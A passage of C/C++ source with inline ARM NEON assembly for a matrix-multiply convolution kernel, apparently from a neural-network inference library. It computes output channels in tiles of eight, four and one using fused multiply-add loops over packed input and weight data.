"dup v29.4s, v1.s[2] \n"
"dup v30.4s, v1.s[3] \n"
"dup v31.4s, v1.s[3] \n"
// inch loop
"lsr w4, %w21, #2 \n"// w4 = nn = inch >> 2
"cmp w4, #0 \n"
"beq 1f \n"
"0: \n"
"prfm pldl1keep, [%8, #512] \n"
"ld1 {v8.4s, v9.4s, v10.4s, v11.4s}, [%8], #64 \n"
"prfm pldl1keep, [%9, #512] \n"
"ld1 {v0.4s, v1.4s, v2.4s, v3.4s}, [%9], #64 \n"
"fmla v16.4s, v8.4s, v0.s[0] \n"
"fmla v18.4s, v8.4s, v0.s[1] \n"
"fmla v20.4s, v8.4s, v0.s[2] \n"
"fmla v22.4s, v8.4s, v0.s[3] \n"
"fmla v17.4s, v9.4s, v0.s[0] \n"
"fmla v19.4s, v9.4s, v0.s[1] \n"
"fmla v21.4s, v9.4s, v0.s[2] \n"
"fmla v23.4s, v9.4s, v0.s[3] \n"
"fmla v24.4s, v8.4s, v1.s[0] \n"
"fmla v26.4s, v8.4s, v1.s[1] \n"
"fmla v28.4s, v8.4s, v1.s[2] \n"
"fmla v30.4s, v8.4s, v1.s[3] \n"
"fmla v25.4s, v9.4s, v1.s[0] \n"
"fmla v27.4s, v9.4s, v1.s[1] \n"
"fmla v29.4s, v9.4s, v1.s[2] \n"
"fmla v31.4s, v9.4s, v1.s[3] \n"
"prfm pldl1keep, [%8, #512] \n"
"ld1 {v12.4s, v13.4s, v14.4s, v15.4s}, [%8], #64 \n"
"fmla v16.4s, v10.4s, v2.s[0] \n"
"fmla v18.4s, v10.4s, v2.s[1] \n"
"fmla v20.4s, v10.4s, v2.s[2] \n"
"fmla v22.4s, v10.4s, v2.s[3] \n"
"fmla v17.4s, v11.4s, v2.s[0] \n"
"fmla v19.4s, v11.4s, v2.s[1] \n"
"fmla v21.4s, v11.4s, v2.s[2] \n"
"fmla v23.4s, v11.4s, v2.s[3] \n"
"fmla v24.4s, v10.4s, v3.s[0] \n"
"fmla v26.4s, v10.4s, v3.s[1] \n"
"fmla v28.4s, v10.4s, v3.s[2] \n"
"fmla v30.4s, v10.4s, v3.s[3] \n"
"fmla v25.4s, v11.4s, v3.s[0] \n"
"fmla v27.4s, v11.4s, v3.s[1] \n"
"fmla v29.4s, v11.4s, v3.s[2] \n"
"fmla v31.4s, v11.4s, v3.s[3] \n"
"prfm pldl1keep, [%9, #512] \n"
"ld1 {v4.4s, v5.4s, v6.4s, v7.4s}, [%9], #64 \n"
"fmla v16.4s, v12.4s, v4.s[0] \n"
"fmla v18.4s, v12.4s, v4.s[1] \n"
"fmla v20.4s, v12.4s, v4.s[2] \n"
"fmla v22.4s, v12.4s, v4.s[3] \n"
"fmla v17.4s, v13.4s, v4.s[0] \n"
"fmla v19.4s, v13.4s, v4.s[1] \n"
"fmla v21.4s, v13.4s, v4.s[2] \n"
"fmla v23.4s, v13.4s, v4.s[3] \n"
"fmla v24.4s, v12.4s, v5.s[0] \n"
"fmla v26.4s, v12.4s, v5.s[1] \n"
"fmla v28.4s, v12.4s, v5.s[2] \n"
"fmla v30.4s, v12.4s, v5.s[3] \n"
"fmla v25.4s, v13.4s, v5.s[0] \n"
"fmla v27.4s, v13.4s, v5.s[1] \n"
"fmla v29.4s, v13.4s, v5.s[2] \n"
"fmla v31.4s, v13.4s, v5.s[3] \n"
"subs w4, w4, #1 \n"
"fmla v16.4s, v14.4s, v6.s[0] \n"
"fmla v18.4s, v14.4s, v6.s[1] \n"
"fmla v20.4s, v14.4s, v6.s[2] \n"
"fmla v22.4s, v14.4s, v6.s[3] \n"
"fmla v17.4s, v15.4s, v6.s[0] \n"
"fmla v19.4s, v15.4s, v6.s[1] \n"
"fmla v21.4s, v15.4s, v6.s[2] \n"
"fmla v23.4s, v15.4s, v6.s[3] \n"
"fmla v24.4s, v14.4s, v7.s[0] \n"
"fmla v26.4s, v14.4s, v7.s[1] \n"
"fmla v28.4s, v14.4s, v7.s[2] \n"
"fmla v30.4s, v14.4s, v7.s[3] \n"
"fmla v25.4s, v15.4s, v7.s[0] \n"
"fmla v27.4s, v15.4s, v7.s[1] \n"
"fmla v29.4s, v15.4s, v7.s[2] \n"
"fmla v31.4s, v15.4s, v7.s[3] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and w4, %w21, #3 \n"// w4 = remain = inch & 3;
"cmp w4, #0 \n"
"beq 3f \n"
"2: \n"
"prfm pldl1keep, [%8, #256] \n"
"ld1 {v8.4s, v9.4s}, [%8], #32 \n"
"prfm pldl1keep, [%9, #256] \n"
"ld1 {v0.4s, v1.4s}, [%9], #32 \n"
"fmla v16.4s, v8.4s, v0.s[0] \n"
"fmla v18.4s, v8.4s, v0.s[1] \n"
"fmla v20.4s, v8.4s, v0.s[2] \n"
"fmla v22.4s, v8.4s, v0.s[3] \n"
"fmla v17.4s, v9.4s, v0.s[0] \n"
"fmla v19.4s, v9.4s, v0.s[1] \n"
"fmla v21.4s, v9.4s, v0.s[2] \n"
"fmla v23.4s, v9.4s, v0.s[3] \n"
"subs w4, w4, #1 \n"
"fmla v24.4s, v8.4s, v1.s[0] \n"
"fmla v26.4s, v8.4s, v1.s[1] \n"
"fmla v28.4s, v8.4s, v1.s[2] \n"
"fmla v30.4s, v8.4s, v1.s[3] \n"
"fmla v25.4s, v9.4s, v1.s[0] \n"
"fmla v27.4s, v9.4s, v1.s[1] \n"
"fmla v29.4s, v9.4s, v1.s[2] \n"
"fmla v31.4s, v9.4s, v1.s[3] \n"
"bne 2b \n"
"3: \n"
"st1 {v16.4s, v17.4s}, [%0], #32 \n"
"st1 {v18.4s, v19.4s}, [%1], #32 \n"
"st1 {v20.4s, v21.4s}, [%2], #32 \n"
"st1 {v22.4s, v23.4s}, [%3], #32 \n"
"st1 {v24.4s, v25.4s}, [%4], #32 \n"
"st1 {v26.4s, v27.4s}, [%5], #32 \n"
"st1 {v28.4s, v29.4s}, [%6], #32 \n"
"st1 {v30.4s, v31.4s}, [%7], #32 \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(outptr4), // %4
"=r"(outptr5), // %5
"=r"(outptr6), // %6
"=r"(outptr7), // %7
"=r"(tmpptr), // %8
"=r"(kptr) // %9
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(outptr4),
"5"(outptr5),
"6"(outptr6),
"7"(outptr7),
"8"(tmpptr),
"9"(kptr),
"r"(biasptr), // %20
"r"(inch) // %21
: "cc", "memory", "x4", "v0", "v1", "v2", "v3", "v4", "v5", "v6", "v7", "v8", "v9", "v10", "v11", "v12", "v13", "v14", "v15", "v16", "v17", "v18", "v19", "v20", "v21", "v22", "v23", "v24", "v25", "v26", "v27", "v28", "v29", "v30", "v31"
);
}
for (; i + 3<size; i += 4)
{
const float* tmpptr = tmp.channel(i / 8 + (i % 8) / 4);
const float* kptr = kernel.channel(p / 8);
asm volatile(
"ld1 {v0.4s, v1.4s}, [%20] \n"
"dup v16.4s, v0.s[0] \n"
"dup v17.4s, v0.s[1] \n"
"dup v18.4s, v0.s[2] \n"
"dup v19.4s, v0.s[3] \n"
"dup v20.4s, v1.s[0] \n"
"dup v21.4s, v1.s[1] \n"
"dup v22.4s, v1.s[2] \n"
"dup v23.4s, v1.s[3] \n"
// inch loop
"lsr w4, %w21, #2 \n"// w4 = nn = inch >> 2
"cmp w4, #0 \n"
"beq 1f \n"
"0: \n"
"prfm pldl1keep, [%8, #512] \n"
"ld1 {v8.4s, v9.4s, v10.4s, v11.4s}, [%8], #64 \n"
"prfm pldl1keep, [%9, #512] \n"
"ld1 {v0.4s, v1.4s, v2.4s, v3.4s}, [%9], #64 \n"
"fmla v16.4s, v8.4s, v0.s[0] \n"
"fmla v17.4s, v8.4s, v0.s[1] \n"
"fmla v18.4s, v8.4s, v0.s[2] \n"
"fmla v19.4s, v8.4s, v0.s[3] \n"
"fmla v20.4s, v8.4s, v1.s[0] \n"
"fmla v21.4s, v8.4s, v1.s[1] \n"
"fmla v22.4s, v8.4s, v1.s[2] \n"
"fmla v23.4s, v8.4s, v1.s[3] \n"
"prfm pldl1keep, [%9, #512] \n"
"ld1 {v4.4s, v5.4s, v6.4s, v7.4s}, [%9], #64 \n"
"fmla v16.4s, v9.4s, v2.s[0] \n"
"fmla v17.4s, v9.4s, v2.s[1] \n"
"fmla v18.4s, v9.4s, v2.s[2] \n"
"fmla v19.4s, v9.4s, v2.s[3] \n"
"fmla v20.4s, v9.4s, v3.s[0] \n"
"fmla v21.4s, v9.4s, v3.s[1] \n"
"fmla v22.4s, v9.4s, v3.s[2] \n"
"fmla v23.4s, v9.4s, v3.s[3] \n"
"subs w4, w4, #1 \n"
"fmla v16.4s, v10.4s, v4.s[0] \n"
"fmla v17.4s, v10.4s, v4.s[1] \n"
"fmla v18.4s, v10.4s, v4.s[2] \n"
"fmla v19.4s, v10.4s, v4.s[3] \n"
"fmla v20.4s, v10.4s, v5.s[0] \n"
"fmla v21.4s, v10.4s, v5.s[1] \n"
"fmla v22.4s, v10.4s, v5.s[2] \n"
"fmla v23.4s, v10.4s, v5.s[3] \n"
"fmla v16.4s, v11.4s, v6.s[0] \n"
"fmla v17.4s, v11.4s, v6.s[1] \n"
"fmla v18.4s, v11.4s, v6.s[2] \n"
"fmla v19.4s, v11.4s, v6.s[3] \n"
"fmla v20.4s, v11.4s, v7.s[0] \n"
"fmla v21.4s, v11.4s, v7.s[1] \n"
"fmla v22.4s, v11.4s, v7.s[2] \n"
"fmla v23.4s, v11.4s, v7.s[3] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and w4, %w21, #3 \n"// w4 = remain = inch & 3;
"cmp w4, #0 \n"
"beq 3f \n"
"2: \n"
"prfm pldl1keep, [%8, #128] \n"
"ld1 {v8.4s}, [%8], #16 \n"
"prfm pldl1keep, [%9, #256] \n"
"ld1 {v0.4s, v1.4s}, [%9], #32 \n"
"fmla v16.4s, v8.4s, v0.s[0] \n"
"fmla v17.4s, v8.4s, v0.s[1] \n"
"fmla v18.4s, v8.4s, v0.s[2] \n"
"fmla v19.4s, v8.4s, v0.s[3] \n"
"subs w4, w4, #1 \n"
"fmla v20.4s, v8.4s, v1.s[0] \n"
"fmla v21.4s, v8.4s, v1.s[1] \n"
"fmla v22.4s, v8.4s, v1.s[2] \n"
"fmla v23.4s, v8.4s, v1.s[3] \n"
"bne 2b \n"
"3: \n"
"st1 {v16.4s}, [%0], #16 \n"
"st1 {v17.4s}, [%1], #16 \n"
"st1 {v18.4s}, [%2], #16 \n"
"st1 {v19.4s}, [%3], #16 \n"
"st1 {v20.4s}, [%4], #16 \n"
"st1 {v21.4s}, [%5], #16 \n"
"st1 {v22.4s}, [%6], #16 \n"
"st1 {v23.4s}, [%7], #16 \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(outptr4), // %4
"=r"(outptr5), // %5
"=r"(outptr6), // %6
"=r"(outptr7), // %7
"=r"(tmpptr), // %8
"=r"(kptr) // %9
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(outptr4),
"5"(outptr5),
"6"(outptr6),
"7"(outptr7),
"8"(tmpptr),
"9"(kptr),
"r"(biasptr), // %20
"r"(inch) // %21
: "cc", "memory", "x4", "v0", "v1", "v2", "v3", "v4", "v5", "v6", "v7", "v8", "v9", "v10", "v11", "v16", "v17", "v18", "v19", "v20", "v21", "v22", "v23"
);
}
for (; i<size; i++)
{
const float* tmpptr = tmp.channel(i / 8 + (i % 8) / 4 + i % 4);
const float* kptr = kernel.channel(p / 8);
asm volatile(
"ld1 {v24.4s, v25.4s}, [%20] \n"
// inch loop
"lsr w4, %w21, #2 \n"// w4 = nn = inch >> 2
"cmp w4, #0 \n"
"beq 1f \n"
"eor v16.16b, v16.16b, v16.16b \n"
"eor v17.16b, v17.16b, v17.16b \n"
"eor v18.16b, v18.16b, v18.16b \n"
"eor v19.16b, v19.16b, v19.16b \n"
"eor v20.16b, v20.16b, v20.16b \n"
"eor v21.16b, v21.16b, v21.16b \n"
"eor v22.16b, v22.16b, v22.16b \n"
"eor v23.16b, v23.16b, v23.16b \n"
"0: \n"
"prfm pldl1keep, [%8, #128] \n"
"ld1 {v8.4s}, [%8], #16 \n"
"prfm pldl1keep, [%9, #512] \n"
"ld1 {v0.4s, v1.4s, v2.4s, v3.4s}, [%9], #64 \n"
"fmla v16.4s, v0.4s, v8.s[0] \n"
"fmla v17.4s, v1.4s, v8.s[0] \n"
"fmla v18.4s, v2.4s, v8.s[1] \n"
"fmla v19.4s, v3.4s, v8.s[1] \n"
"prfm pldl1keep, [%9, #512] \n"
"ld1 {v4.4s, v5.4s, v6.4s, v7.4s}, [%9], #64 \n"
"subs w4, w4, #1 \n"
"fmla v20.4s, v4.4s, v8.s[2] \n"
"fmla v21.4s, v5.4s, v8.s[2] \n"
"fmla v22.4s, v6.4s, v8.s[3] \n"
"fmla v23.4s, v7.4s, v8.s[3] \n"
"bne 0b \n"
"fadd v16.4s, v16.4s, v18.4s \n"
"fadd v17.4s, v17.4s, v19.4s \n"
"fadd v20.4s, v20.4s, v22.4s \n"
"fadd v21.4s, v21.4s, v23.4s \n"
"fadd v16.4s, v16.4s, v20.4s \n"
"fadd v17.4s, v17.4s, v21.4s \n"
"fadd v24.4s, v24.4s, v16.4s \n"
"fadd v25.4s, v25.4s, v17.4s \n"
"1: \n"
// remain loop
"and w4, %w21, #3 \n"// w4 = remain = inch & 3;
"cmp w4, #0 \n"
"beq 3f \n"
"2: \n"
"prfm pldl1keep, [%8, #32] \n"
"ld1r {v8.4s}, [%8], #4 \n"
"prfm pldl1keep, [%9, #256] \n"
"ld1 {v0.4s, v1.4s}, [%9], #32 \n"
"subs w4, w4, #1 \n"
"fmla v24.4s, v8.4s, v0.4s \n"
"fmla v25.4s, v8.4s, v1.4s \n"
"bne 2b \n"
"3: \n"
"st1 {v24.s}[0],[%0], #4 \n"
"st1 {v24.s}[1],[%1], #4 \n"
"st1 {v24.s}[2],[%2], #4 \n"
"st1 {v24.s}[3],[%3], #4 \n"
"st1 {v25.s}[0],[%4], #4 \n"
"st1 {v25.s}[1],[%5], #4 \n"
"st1 {v25.s}[2],[%6], #4 \n"
"st1 {v25.s}[3],[%7], #4 \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(outptr4), // %4
"=r"(outptr5), // %5
"=r"(outptr6), // %6
"=r"(outptr7), // %7
"=r"(tmpptr), // %8
"=r"(kptr) // %9
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(outptr4),
"5"(outptr5),
"6"(outptr6),
"7"(outptr7),
"8"(tmpptr),
"9"(kptr),
"r"(biasptr), // %20
"r"(inch) // %21
: "cc", "memory", "x4", "v0", "v1", "v2", "v3", "v4", "v5", "v6", "v7", "v8", "v9", "v10", "v11", "v16", "v17", "v18", "v19", "v20", "v21", "v22", "v23", "v24", "v25"
);
}
}
#endif // __ARMV8
nn_outch = (outch - remain_outch_start) >> 2;
#pragma omp parallel for num_threads(opt.num_threads)
for (int pp = 0; pp<nn_outch; pp++)
{
int p = remain_outch_start + pp * 4;
float* outptr0 = top_blob.channel(p);
float* outptr1 = top_blob.channel(p + 1);
float* outptr2 = top_blob.channel(p + 2);
float* outptr3 = top_blob.channel(p + 3);
const float zeros[4] = { 0.f, 0.f, 0.f, 0.f };
const float* biasptr = bias ? bias + p : zeros;
int i = 0;
for (; i + 7<size; i += 8)
{
const float* tmpptr = tmp.channel(i / 8);
#if __ARMV8
const float* kptr = kernel.channel(p / 8 + (p % 8) / 4);
#else
const float* kptr = kernel.channel(p / 4);
#endif // __ARMV8
#if __ARMV8
asm volatile(
"ld1 {v0.4s}, [%12] \n"
"dup v8.4s, v0.s[0] \n"
"dup v9.4s, v0.s[0] \n"
"dup v10.4s, v0.s[1] \n"
"dup v11.4s, v0.s[1] \n"
"dup v12.4s, v0.s[2] \n"
"dup v13.4s, v0.s[2] \n"
"dup v14.4s, v0.s[3] \n"
"dup v15.4s, v0.s[3] \n"
// inch loop
"lsr w4, %w13, #2 \n"// w4 = nn = inch >> 2
"cmp w4, #0 \n"
"beq 1f \n"
"0: \n"
"prfm pldl1keep, [%4, #512] \n"
"ld1 {v4.4s, v5.4s, v6.4s, v7.4s}, [%4], #64 \n"
"prfm pldl1keep, [%5, #512] \n"
"ld1 {v0.4s, v1.4s, v2.4s, v3.4s}, [%5], #64 \n"
"fmla v8.4s, v4.4s, v0.s[0] \n"
"fmla v10.4s, v4.4s, v0.s[1] \n"
"fmla v12.4s, v4.4s, v0.s[2] \n"
"fmla v14.4s, v4.4s, v0.s[3] \n"
"fmla v9.4s, v5.4s, v0.s[0] \n"
"fmla v11.4s, v5.4s, v0.s[1] \n"
"fmla v13.4s, v5.4s, v0.s[2] \n"
"fmla v15.4s, v5.4s, v0.s[3] \n"
"prfm pldl1keep, [%4, #512] \n"
"ld1 {v16.4s, v17.4s, v18.4s, v19.4s}, [%4], #64 \n"
"fmla v8.4s, v6.4s, v1.s[0] \n"
"fmla v10.4s, v6.4s, v1.s[1] \n"
"fmla v12.4s, v6.4s, v1.s[2] \n"
"fmla v14.4s, v6.4s, v1.s[3] \n"
"fmla v9.4s, v7.4s, v1.s[0] \n"
"fmla v11.4s, v7.4s, v1.s[1] \n"
"fmla v13.4s, v7.4s, v1.s[2] \n"
"fmla v15.4s, v7.4s, v1.s[3] \n"
"subs w4, w4, #1 \n"
"fmla v8.4s, v16.4s, v2.s[0] \n"
"fmla v10.4s, v16.4s, v2.s[1] \n"
"fmla v12.4s, v16.4s, v2.s[2] \n"
"fmla v14.4s, v16.4s, v2.s[3] \n"
"fmla v9.4s, v17.4s, v2.s[0] \n"
"fmla v11.4s, v17.4s, v2.s[1] \n"
"fmla v13.4s, v17.4s, v2.s[2] \n"
"fmla v15.4s, v17.4s, v2.s[3] \n"
"fmla v8.4s, v18.4s, v3.s[0] \n"
"fmla v10.4s, v18.4s, v3.s[1] \n"
"fmla v12.4s, v18.4s, v3.s[2] \n"
"fmla v14.4s, v18.4s, v3.s[3] \n"
"fmla v9.4s, v19.4s, v3.s[0] \n"
"fmla v11.4s, v19.4s, v3.s[1] \n"
"fmla v13.4s, v19.4s, v3.s[2] \n"
"fmla v15.4s, v19.4s, v3.s[3] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and w4, %w13, #3 \n"// w4 = remain = inch & 3;
"cmp w4, #0 \n"
"beq 3f \n"
"2: \n"
"prfm pldl1keep, [%4, #256] \n"
"ld1 {v4.4s, v5.4s}, [%4], #32 \n"
"prfm pldl1keep, [%5, #128] \n"
"ld1 {v0.4s}, [%5], #16 \n"
"fmla v8.4s, v4.4s, v0.s[0] \n"
"fmla v10.4s, v4.4s, v0.s[1] \n"
"fmla v12.4s, v4.4s, v0.s[2] \n"
"fmla v14.4s, v4.4s, v0.s[3] \n"
"subs w4, w4, #1 \n"
"fmla v9.4s, v5.4s, v0.s[0] \n"
"fmla v11.4s, v5.4s, v0.s[1] \n"
"fmla v13.4s, v5.4s, v0.s[2] \n"
"fmla v15.4s, v5.4s, v0.s[3] \n"
"bne 2b \n"
"3: \n"
"st1 {v8.4s, v9.4s}, [%0], #32 \n"
"st1 {v10.4s, v11.4s}, [%1], #32 \n"
"st1 {v12.4s, v13.4s}, [%2], #32 \n"
"st1 {v14.4s, v15.4s}, [%3], #32 \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(tmpptr), // %4
"=r"(kptr) // %5
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(tmpptr),
"5"(kptr),
"r"(biasptr), // %12
"r"(inch) // %13
: "cc", "memory", "x4", "v0", "v1", "v2", "v3", "v4", "v5", "v6", "v7", "v8", "v9", "v10", "v11", "v12", "v13", "v14", "v15", "v16", "v17", "v18", "v19"
);
#else // __ARMV8
asm volatile(
"vld1.f32 {d0-d1}, [%12] \n"
"vdup.f32 q8, d0[0] \n"
"vdup.f32 q9, d0[0] \n"
"vdup.f32 q10, d0[1] \n"
"vdup.f32 q11, d0[1] \n"
"vdup.f32 q12, d1[0] \n"
"vdup.f32 q13, d1[0] \n"
"vdup.f32 q14, d1[1] \n"
"vdup.f32 q15, d1[1] \n"
// inch loop
"lsr r4, %13, #2 \n"// r4 = nn = inch >> 2
"cmp r4, #0 \n"
"beq 1f \n"
"0: \n"
"pld [%4, #512] \n"
"vldm %4!, {d8-d15} \n"
// "vld1.f32 {d8-d11}, [%4 :128]! \n"
// "vld1.f32 {d12-d15}, [%4 :128]! \n"
"pld [%5, #512] \n"
"vldm %5!, {d0-d7} \n"
// "vld1.f32 {d0-d3}, [%5 :128]! \n"
// "vld1.f32 {d4-d7}, [%5 :128]! \n"
"vmla.f32 q8, q4, d0[0] \n"
"vmla.f32 q10, q4, d0[1] \n"
"vmla.f32 q12, q4, d1[0] \n"
"vmla.f32 q14, q4, d1[1] \n"
"vmla.f32 q9, q5, d0[0] \n"
"vmla.f32 q11, q5, d0[1] \n"
"vmla.f32 q13, q5, d1[0] \n"
"vmla.f32 q15, q5, d1[1] \n"
"vmla.f32 q8, q6, d2[0] \n"
"vmla.f32 q10, q6, d2[1] \n"
"vmla.f32 q12, q6, d3[0] \n"
"vmla.f32 q14, q6, d3[1] \n"
"vmla.f32 q9, q7, d2[0] \n"
"vmla.f32 q11, q7, d2[1] \n"
"vmla.f32 q13, q7, d3[0] \n"
"vmla.f32 q15, q7, d3[1] \n"
"pld [%4, #512] \n"
"vldm %4!, {d8-d15} \n"
// "vld1.f32 {d8-d11}, [%4 :128]! \n"
// "vld1.f32 {d12-d15}, [%4 :128]! \n"
"vmla.f32 q8, q4, d4[0] \n"
"vmla.f32 q10, q4, d4[1] \n"
"vmla.f32 q12, q4, d5[0] \n"
"vmla.f32 q14, q4, d5[1] \n"
"vmla.f32 q9, q5, d4[0] \n"
"vmla.f32 q11, q5, d4[1] \n"
"vmla.f32 q13, q5, d5[0] \n"
"vmla.f32 q15, q5, d5[1] \n"
"subs r4, r4, #1 \n"
"vmla.f32 q8, q6, d6[0] \n"
"vmla.f32 q10, q6, d6[1] \n"
"vmla.f32 q12, q6, d7[0] \n"
"vmla.f32 q14, q6, d7[1] \n"
"vmla.f32 q9, q7, d6[0] \n"
"vmla.f32 q11, q7, d6[1] \n"
"vmla.f32 q13, q7, d7[0] \n"
"vmla.f32 q15, q7, d7[1] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and r4, %13, #3 \n"// r4 = remain = inch & 3;
"cmp r4, #0 \n"
"beq 3f \n"
"2: \n"
"pld [%4, #256] \n"
"vld1.f32 {d8-d11}, [%4 :128]! \n"
"pld [%5, #128] \n"
"vld1.f32 {d0-d1}, [%5 :128]! \n"
"vmla.f32 q8, q4, d0[0] \n"
"vmla.f32 q10, q4, d0[1] \n"
"vmla.f32 q12, q4, d1[0] \n"
"vmla.f32 q14, q4, d1[1] \n"
"subs r4, r4, #1 \n"
"vmla.f32 q9, q5, d0[0] \n"
"vmla.f32 q11, q5, d0[1] \n"
"vmla.f32 q13, q5, d1[0] \n"
"vmla.f32 q15, q5, d1[1] \n"
"bne 2b \n"
"3: \n"
"vst1.f32 {d16-d19}, [%0 :128]! \n"
"vst1.f32 {d20-d23}, [%1 :128]! \n"
"vst1.f32 {d24-d27}, [%2 :128]! \n"
"vst1.f32 {d28-d31}, [%3 :128]! \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(tmpptr), // %4
"=r"(kptr) // %5
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(tmpptr),
"5"(kptr),
"r"(biasptr), // %12
"r"(inch) // %13
: "cc", "memory", "r4", "q0", "q1", "q2", "q3", "q4", "q5", "q6", "q7", "q8", "q9", "q10", "q11", "q12", "q13", "q14", "q15"
);
#endif // __ARMV8
}
for (; i + 3<size; i += 4)
{
const float* tmpptr = tmp.channel(i / 8 + (i % 8) / 4);
#if __ARMV8
const float* kptr = kernel.channel(p / 8 + (p % 8) / 4);
#else
const float* kptr = kernel.channel(p / 4);
#endif // __ARMV8
#if __ARMV8
asm volatile(
"ld1 {v0.4s}, [%12] \n"
"dup v8.4s, v0.s[0] \n"
"dup v9.4s, v0.s[1] \n"
"dup v10.4s, v0.s[2] \n"
"dup v11.4s, v0.s[3] \n"
// inch loop
"lsr w4, %w13, #2 \n"// w4 = nn = inch >> 2
"cmp w4, #0 \n"
"beq 1f \n"
"0: \n"
"prfm pldl1keep, [%4, #512] \n"
"ld1 {v4.4s, v5.4s, v6.4s, v7.4s}, [%4], #64 \n"
"prfm pldl1keep, [%5, #512] \n"
"ld1 {v0.4s, v1.4s, v2.4s, v3.4s}, [%5], #64 \n"
"fmla v8.4s, v4.4s, v0.s[0] \n"
"fmla v9.4s, v4.4s, v0.s[1] \n"
"fmla v10.4s, v4.4s, v0.s[2] \n"
"fmla v11.4s, v4.4s, v0.s[3] \n"
"fmla v8.4s, v5.4s, v1.s[0] \n"
"fmla v9.4s, v5.4s, v1.s[1] \n"
"fmla v10.4s, v5.4s, v1.s[2] \n"
"fmla v11.4s, v5.4s, v1.s[3] \n"
"subs w4, w4, #1 \n"
"fmla v8.4s, v6.4s, v2.s[0] \n"
"fmla v9.4s, v6.4s, v2.s[1] \n"
"fmla v10.4s, v6.4s, v2.s[2] \n"
"fmla v11.4s, v6.4s, v2.s[3] \n"
"fmla v8.4s, v7.4s, v3.s[0] \n"
"fmla v9.4s, v7.4s, v3.s[1] \n"
"fmla v10.4s, v7.4s, v3.s[2] \n"
"fmla v11.4s, v7.4s, v3.s[3] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and w4, %w13, #3 \n"// w4 = remain = inch & 3;
"cmp w4, #0 \n"
"beq 3f \n"
"2: \n"
"prfm pldl1keep, [%4, #128] \n"
"ld1 {v4.4s}, [%4], #16 \n"
"prfm pldl1keep, [%5, #128] \n"
"ld1 {v0.4s}, [%5], #16 \n"
"subs w4, w4, #1 \n"
"fmla v8.4s, v4.4s, v0.s[0] \n"
"fmla v9.4s, v4.4s, v0.s[1] \n"
"fmla v10.4s, v4.4s, v0.s[2] \n"
"fmla v11.4s, v4.4s, v0.s[3] \n"
"bne 2b \n"
"3: \n"
"st1 {v8.4s}, [%0], #16 \n"
"st1 {v9.4s}, [%1], #16 \n"
"st1 {v10.4s}, [%2], #16 \n"
"st1 {v11.4s}, [%3], #16 \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(tmpptr), // %4
"=r"(kptr) // %5
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(tmpptr),
"5"(kptr),
"r"(biasptr), // %12
"r"(inch) // %13
: "cc", "memory", "x4", "v0", "v1", "v2", "v3", "v4", "v5", "v6", "v7", "v8", "v9", "v10", "v11"
);
#else // __ARMV8
asm volatile(
"vld1.f32 {d0-d1}, [%12] \n"
"vdup.f32 q8, d0[0] \n"
"vdup.f32 q9, d0[1] \n"
"vdup.f32 q10, d1[0] \n"
"vdup.f32 q11, d1[1] \n"
// inch loop
"lsr r4, %13, #2 \n"// r4 = nn = inch >> 2
"cmp r4, #0 \n"
"beq 1f \n"
"0: \n"
"pld [%4, #512] \n"
"vldm %4!, {d8-d15} \n"
// "vld1.f32 {d8-d11}, [%4 :128]! \n"
// "vld1.f32 {d12-d15}, [%4 :128]! \n"
"pld [%5, #512] \n"
"vldm %5!, {d0-d7} \n"
// "vld1.f32 {d0-d3}, [%5 :128]! \n"
// "vld1.f32 {d4-d7}, [%5 :128]! \n"
"vmla.f32 q8, q4, d0[0] \n"
"vmla.f32 q9, q4, d0[1] \n"
"vmla.f32 q10, q4, d1[0] \n"
"vmla.f32 q11, q4, d1[1] \n"
"vmla.f32 q8, q5, d2[0] \n"
"vmla.f32 q9, q5, d2[1] \n"
"vmla.f32 q10, q5, d3[0] \n"
"vmla.f32 q11, q5, d3[1] \n"
"subs r4, r4, #1 \n"
"vmla.f32 q8, q6, d4[0] \n"
"vmla.f32 q9, q6, d4[1] \n"
"vmla.f32 q10, q6, d5[0] \n"
"vmla.f32 q11, q6, d5[1] \n"
"vmla.f32 q8, q7, d6[0] \n"
"vmla.f32 q9, q7, d6[1] \n"
"vmla.f32 q10, q7, d7[0] \n"
"vmla.f32 q11, q7, d7[1] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and r4, %13, #3 \n"// r4 = remain = inch & 3;
"cmp r4, #0 \n"
"beq 3f \n"
"2: \n"
"pld [%4, #128] \n"
"vld1.f32 {d8-d9}, [%4 :128]! \n"
"pld [%5, #128] \n"
"vld1.f32 {d0-d1}, [%5 :128]! \n"
"subs r4, r4, #1 \n"
"vmla.f32 q8, q4, d0[0] \n"
"vmla.f32 q9, q4, d0[1] \n"
"vmla.f32 q10, q4, d1[0] \n"
"vmla.f32 q11, q4, d1[1] \n"
"bne 2b \n"
"3: \n"
"vst1.f32 {d16-d17}, [%0 :128]! \n"
"vst1.f32 {d18-d19}, [%1 :128]! \n"
"vst1.f32 {d20-d21}, [%2 :128]! \n"
"vst1.f32 {d22-d23}, [%3 :128]! \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(tmpptr), // %4
"=r"(kptr) // %5
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
